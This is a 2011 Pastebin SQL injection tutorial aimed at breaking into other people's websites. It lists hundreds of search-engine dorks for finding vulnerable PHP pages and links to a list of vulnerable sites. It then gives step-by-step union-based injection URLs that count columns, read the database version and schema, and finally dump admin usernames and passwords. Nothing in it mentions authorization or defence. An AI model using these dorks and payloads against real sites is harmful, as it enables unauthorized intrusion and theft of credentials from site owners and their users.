Advertisement
Hailedcap

SQLI tutorial(good)

Nov 22nd, 2011
468
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. if you want to support me on making more tutorials, it only cost's 5 seconds of your life :-) and you get to see many more tutorials (Y)
  2.  
  3. http://adf.ly/3pnxG
  4.  
  5. visit this site also :-)
  6.  
  7. http://acttodaynow.blogspot.com/
  8.  
  9. Thank you<3
  10.  
  11. Introduction:
  12.  
  13. Sqli (aka SQL Injection OR Structured Query LANGUAGE Injection) IS the FIRST step IN the entry TO exploiting OR hacking websites. It IS easily done AND it IS a great starting off point. Unfortunately most sqli tutorials suck, so that IS why I am writing this one. Sqli IS just basically injecting queries INTO a DATABASE OR USING queries TO GET authorization bypass AS an admin.
  14.  
  15. Finding Sites TO Inject:
  16.  
  17. Finding SQLI Vulnerable sits IS extremely easy ALL you need TO do IS SOME googling. The FIRST thing you need TO do are find SOME dorks.
  18.  
  19. SQLI DORKS:
  20. Code:
  21. inurl:trainers.php?id=
  22. inurl:buy.php?category=
  23. inurl:article.php?ID=
  24. inurl:play_old.php?id=
  25. inurl:declaration_more.php?decl_id=
  26. inurl:pageid=
  27. inurl:games.php?id=
  28. inurl:page.php?file=
  29. inurl:newsDetail.php?id=
  30. inurl:gallery.php?id=
  31. inurl:article.php?id=
  32. inurl:SHOW.php?id=
  33. inurl:staff_id=
  34. inurl:newsitem.php?num=
  35. inurl:readnews.php?id=
  36. inurl:top10.php?cat=
  37. inurl:historialeer.php?num=
  38. inurl:reagir.php?num=
  39. inurl:Stray-Questions-VIEW.php?num=
  40. inurl:forum_bds.php?num=
  41. inurl:game.php?id=
  42. inurl:view_product.php?id=
  43. inurl:newsone.php?id=
  44. inurl:sw_comment.php?id=
  45. inurl:news.php?id=
  46. inurl:avd_start.php?avd=
  47. inurl:event.php?id=
  48. inurl:product-item.php?id=
  49. inurl:SQL.php?id=
  50. inurl:news_view.php?id=
  51. inurl:select_biblio.php?id=
  52. inurl:humor.php?id=
  53. inurl:aboutbook.php?id=
  54. inurl:ogl_inet.php?ogl_id=
  55. inurl:fiche_spectacle.php?id=
  56. inurl:communique_detail.php?id=
  57. inurl:sem.php3?id=
  58. inurl:kategorie.php4?id=
  59. inurl:news.php?id=
  60. inurl:INDEX.php?id=
  61. inurl:faq2.php?id=
  62. inurl:show_an.php?id=
  63. inurl:preview.php?id=
  64. inurl:loadpsb.php?id=
  65. inurl:opinions.php?id=
  66. inurl:spr.php?id=
  67. inurl:pages.php?id=
  68. inurl:announce.php?id=
  69. inurl:clanek.php4?id=
  70. inurl:participant.php?id=
  71. inurl:download.php?id=
  72. inurl:main.php?id=
  73. inurl:review.php?id=
  74. inurl:chappies.php?id=
  75. inurl:READ.php?id=
  76. inurl:prod_detail.php?id=
  77. inurl:viewphoto.php?id=
  78. inurl:article.php?id=
  79. inurl:person.php?id=
  80. inurl:productinfo.php?id=
  81. inurl:showimg.php?id=
  82. inurl:VIEW.php?id=
  83. inurl:website.php?id=
  84. inurl:hosting_info.php?id=
  85. inurl:gallery.php?id=
  86. inurl:rub.php?idr=
  87. inurl:view_faq.php?id=
  88. inurl:artikelinfo.php?id=
  89. inurl:detail.php?ID=
  90. inurl:INDEX.php?=
  91. inurl:profile_view.php?id=
  92. inurl:category.php?id=
  93. inurl:publications.php?id=
  94. inurl:fellows.php?id=
  95. inurl:downloads_info.php?id=
  96. inurl:prod_info.php?id=
  97. inurl:shop.php?do=part&id=
  98. inurl:productinfo.php?id=
  99. inurl:collectionitem.php?id=
  100. inurl:band_info.php?id=
  101. inurl:product.php?id=
  102. inurl:releases.php?id=
  103. inurl:ray.php?id=
  104. inurl:produit.php?id=
  105. inurl:pop.php?id=
  106. inurl:shopping.php?id=
  107. inurl:productdetail.php?id=
  108. inurl:post.php?id=
  109. inurl:viewshowdetail.php?id=
  110. inurl:clubpage.php?id=
  111. inurl:memberInfo.php?id=
  112. inurl:SECTION.php?id=
  113. inurl:theme.php?id=
  114. inurl:page.php?id=
  115. inurl:shredder-categories.php?id=
  116. inurl:tradeCategory.php?id=
  117. inurl:product_ranges_view.php?ID=
  118. inurl:shop_category.php?id=
  119. inurl:transcript.php?id=
  120. inurl:channel_id=
  121. inurl:item_id=
  122. inurl:newsid=
  123. inurl:trainers.php?id=
  124. inurl:news-FULL.php?id=
  125. inurl:news_display.php?getid=
  126. inurl:index2.php?OPTION=
  127. inurl:readnews.php?id=
  128. inurl:top10.php?cat=
  129. inurl:newsone.php?id=
  130. inurl:event.php?id=
  131. inurl:product-item.php?id=
  132. inurl:SQL.php?id=
  133. inurl:aboutbook.php?id=
  134. inurl:preview.php?id=
  135. inurl:loadpsb.php?id=
  136. inurl:pages.php?id=
  137. inurl:material.php?id=
  138. inurl:clanek.php4?id=
  139. inurl:announce.php?id=
  140. inurl:chappies.php?id=
  141. inurl:READ.php?id=
  142. inurl:viewapp.php?id=
  143. inurl:viewphoto.php?id=
  144. inurl:rub.php?idr=
  145. inurl:galeri_info.php?l=
  146. inurl:review.php?id=
  147. inurl:iniziativa.php?IN=
  148. inurl:curriculum.php?id=
  149. inurl:labels.php?id=
  150. inurl:story.php?id=
  151. inurl:look.php?ID=
  152. inurl:newsone.php?id=
  153. inurl:aboutbook.php?id=
  154. inurl:material.php?id=
  155. inurl:opinions.php?id=
  156. inurl:announce.php?id=
  157. inurl:rub.php?idr=
  158. inurl:galeri_info.php?l=
  159. inurl:tekst.php?idt=
  160. inurl:newscat.php?id=
  161. inurl:newsticker_info.php?idn=
  162. inurl:rubrika.php?idr=
  163. inurl:rubp.php?idr=
  164. inurl:offer.php?idf=
  165. inurl:art.php?idm=
  166. inurl:title.php?id=
  167. buy.php?category=
  168. article.php?ID=
  169. play_old.php?id=
  170. declaration_more.php?decl_id=
  171. Pageid=
  172. games.php?id=
  173. page.php?file=
  174. newsDetail.php?id=
  175. gallery.php?id=
  176. article.php?id=
  177. play_old.php?id=
  178. SHOW.php?id=
  179. staff_id=
  180. newsitem.php?num=
  181. readnews.php?id=
  182. top10.php?cat=
  183. historialeer.php?num=
  184. reagir.php?num=
  185. forum_bds.php?num=
  186. game.php?id=
  187. view_product.php?id=
  188. newsone.php?id=
  189. sw_comment.php?id=
  190. news.php?id=
  191. avd_start.php?avd=
  192. event.php?id=
  193. product-item.php?id=
  194. SQL.php?id=
  195. news_view.php?id=
  196. select_biblio.php?id=
  197. humor.php?id=
  198. aboutbook.php?id=
  199. fiche_spectacle.php?id=
  200. communique_detail.php?id=
  201. sem.php3?id=
  202. kategorie.php4?id=
  203. faq2.php?id=
  204. show_an.php?id=
  205. preview.php?id=
  206. loadpsb.php?id=
  207. opinions.php?id=
  208. spr.php?id=
  209. pages.php?id=
  210. announce.php?id=
  211. clanek.php4?id=
  212. participant.php?id=
  213. download.php?id=
  214. main.php?id=
  215. review.php?id=
  216. chappies.php?id=
  217. READ.php?id=
  218. prod_detail.php?id=
  219. viewphoto.php?id=
  220. article.php?id=
  221. play_old.php?id=
  222. declaration_more.php?decl_id=
  223. category.php?id=
  224. publications.php?id=
  225. fellows.php?id=
  226. downloads_info.php?id=
  227. prod_info.php?id=
  228. shop.php?do=part&id=
  229. Productinfo.php?id=
  230. website.php?id=
  231. Productinfo.php?id=
  232. showimg.php?id=
  233. VIEW.php?id=
  234. rub.php?idr=
  235. view_faq.php?id=
  236. artikelinfo.php?id=
  237. detail.php?ID=
  238. collectionitem.php?id=
  239. band_info.php?id=
  240. product.php?id=
  241. releases.php?id=
  242. ray.php?id=
  243. produit.php?id=
  244. pop.php?id=
  245. shopping.php?id=
  246. productdetail.php?id=
  247. post.php?id=
  248. viewshowdetail.php?id=
  249. clubpage.php?id=
  250. memberInfo.php?id=
  251. SECTION.php?id=
  252. theme.php?id=
  253. page.php?id=
  254. shredder-categories.php?id=
  255. tradeCategory.php?id=
  256. shop_category.php?id=
  257. transcript.php?id=
  258. channel_id=
  259. item_id=
  260. newsid=
  261. trainers.php?id=
  262. buy.php?category=
  263. article.php?ID=
  264. play_old.php?id=
  265. iniziativa.php?IN=
  266. detail_new.php?id=
  267. tekst.php?idt=
  268. newscat.php?id=
  269. newsticker_info.php?idn=
  270. rubrika.php?idr=
  271. rubp.php?idr=
  272. offer.php?idf=
  273. hotel.php?id=
  274. art.php?idm=
  275. title.php?id=
  276. look.php?ID=
  277. story.php?id=
  278. labels.php?id=
  279. review.php?id=
  280. chappies.php?id=
  281. news-FULL.php?id=
  282. news_display.php?getid=
  283. index2.php?OPTION=
  284. ages.php?id=
  285. "id=" & intext:"Warning: mysql_fetch_assoc()
  286. "id=" & intext:"Warning: mysql_fetch_array()
  287. "id=" & intext:"Warning: mysql_num_rows()
  288. "id=" & intext:"Warning: session_start()
  289. "id=" & intext:"Warning: getimagesize()
  290. "id=" & intext:"Warning: UNKNOWN()
  291. "id=" & intext:"Warning: pg_exec()
  292. "id=" & intext:"Warning: array_merge()
  293. "id=" & intext:"Warning: mysql_result()
  294. "id=" & intext:"Warning: mysql_num_rows()
  295. "id=" & intext:"Warning: mysql_query()
  296. "id=" & intext:"Warning: filesize()
  297. "id=" & intext:"Warning: require()
  298.  
  299. Pick one of those dorks and add inurl: before it
  300. (If they do not already have it) and then copy and paste
  301. it into google. Pick one of the sites off google and go to it.
  302. For example the url of the page you are on may look like this
  303.  
  304. Code:
  305. http://www.example.com/index.php?id=3
  306.  
  307. To check that it is vulnerable all you have to do is
  308. put a ' at the end of the url. So now your url should
  309. Look like this
  310. Code:
  311. http://www.example.com/index.php?id=3'
  312.  
  313. Press enter and you get some kind of error. The errors will vary
  314. but it should look something like this
  315.  
  316. http://i982.photobucket.com/albums/ae308/blink1337/1.png
  317. Image exceeds set limits. Click to view full size image
  318.  
  319.  
  320. If an error happends that site is vulerable!
  321.  
  322. Also If you are lazy you can check
  323. my list of vulnerable sites here
  324.  
  325. http://allianceforums.co.cc/forums/thread-1249.html
  326.  
  327. Getting Number of Columns
  328.  
  329. After you find your vulnerable site the first step you need to take is
  330. to find the number of columns. The easiest way to do this is
  331. use the statement "ORDER BY". All you have to do is put ORDER BY (number)--
  332. at the end of your url. So it should look like this.
  333.  
  334. Code:
  335. http://www.example.com/index.php?id=3 ORDER BY (number)--
  336.  
  337. You want to start with ORDER BY 1-- and keep increasing the number by 1 until you get an error.
  338.  
  339. For example
  340.  
  341. Code:
  342. http://www.example.com/index.php?id=3 order by 1--
  343. http://www.example.com/index.php?id=3 order by 2--
  344. http://www.example.com/index.php?id=3 order by 3--
  345. http://www.example.com/index.php?id=3 order by 4--
  346. http://www.example.com/index.php?id=3 order by 5--
  347. http://www.example.com/index.php?id=3 order by 6--
  348. http://www.example.com/index.php?id=3 order by 7--
  349. http://www.example.com/index.php?id=3 order by 8--
  350.  
  351. Lets say on order by 8-- you get an error page. This means that the website has 7 columns because
  352. it will give you errors on anything over 7. If you have a bad memory you should open notepad and
  353. write the # of columns you find.
  354.  
  355. Finding Acsessable Columns
  356.  
  357. Now that we have the number of columns we need to get the column numbers that we can grab information from.
  358. We do this by by using the "UNION" "SELECT" and Number of columns. You put them together in your
  359. url like this
  360. Code:
  361. http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
  362.  
  363. For the end part of the url, (1,2,3,4,5,6,7) You put the number of columns
  364. you found in the first step. Since I found that the site I was testing had 7
  365. columns I put 1,2,3,4,5,6,7. Also remeber to put a - infront of the id number.
  366. After you do that you should get something like this...
  367.  
  368.  
  369. The page should look a bit fucked up and there should be 2 numbers on the page.
  370. These two numbers are the colum numbers we can get information from. We will replace them with statements later on so
  371. write them down or remeber them.
  372.  
  373. Finding MySQL Database Version
  374. The reasons you need the database name is to see weather or not the website is worth your time
  375. because any msql database under 5 you will have to blindly guess the table and column names.
  376. If you are a begginer and you find that the database is below 5 I urge you to find
  377. a different site.
  378.  
  379. Now we take one of the numbers that we found from the step above and replace it with @@version
  380. For Example, before our url looked like this
  381. Code:
  382. http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
  383.  
  384. Now since we will replace the 1 with @@version
  385.  
  386. Code:
  387. http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--
  388. Press enter and now the page should display the database number.
  389.  
  390.  
  391. Now the number that we had in the first step will be replaced with the database number. As it shows above
  392. The site that I am testing has a version number of 5.0.45. Since this number is 5 or above we will continue working on
  393. this site.
  394.  
  395. Finding Database Names
  396.  
  397. Next we are going to inject the website to find the database names. We do this by replacing @@version
  398. with group_concat(schema_name) and also add + from+information_schema.schemata-- after the last number in our url
  399. So now our url should look like this
  400.  
  401. Code:
  402. http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--
  403.  
  404.  
  405. It will list the database names. Now to find which one is currently in use replace group_concat(schema_name) with
  406. concat(database()) and delete + from+information_schema.schemata So the url should now look like this
  407.  
  408. Code:
  409. http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
  410. It will display which database which is in use. You may want to write it down.
  411.  
  412.  
  413. Finding Table Names
  414.  
  415.  
  416. To get table names of current database you need to replace concat(database()) with group_concat(table_name)
  417. and add from information_schema.tables where table_schema=database() between the last number and the -- also remove the
  418. + signs from the union select. Now your url should look like this
  419.  
  420. Code:
  421. http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--
  422.  
  423. The page should now show the Table names. You may want to write them down.
  424.  
  425. http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.png
  426. Image exceeds set limits. Click to view full size image
  427.  
  428.  
  429.  
  430. Finding Column Names
  431.  
  432. This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns.
  433. So your url should look like.
  434.  
  435. Code:
  436. http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
  437.  
  438. This should give you the column names. You may want to write them down.
  439.  
  440. Lets say they gave us back the cloumn names
  441.  
  442. admin_username
  443. admin_password
  444.  
  445. Getting Information
  446.  
  447. Now we can have the database name, table names, and colomn names we can put them together and
  448. pull information from them. Do to this we need to put the following in our url.
  449. Code:
  450. http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--
  451.  
  452. Now replace columnname with the column names you want infomation from. The 0x3a will make a : to seperate the information
  453. for you. Put as many column names as you want to remeber to stick to the format. Also replace databasename.tablename
  454. With the database name and the table name the column names where in. After all this your url should look something
  455. like this.
  456.  
  457. Code:
  458. http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--
  459.  
  460. Now you should get usernames and passwords for the admin or what ever information you wanted to get.
  461.  
  462.  
  463.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement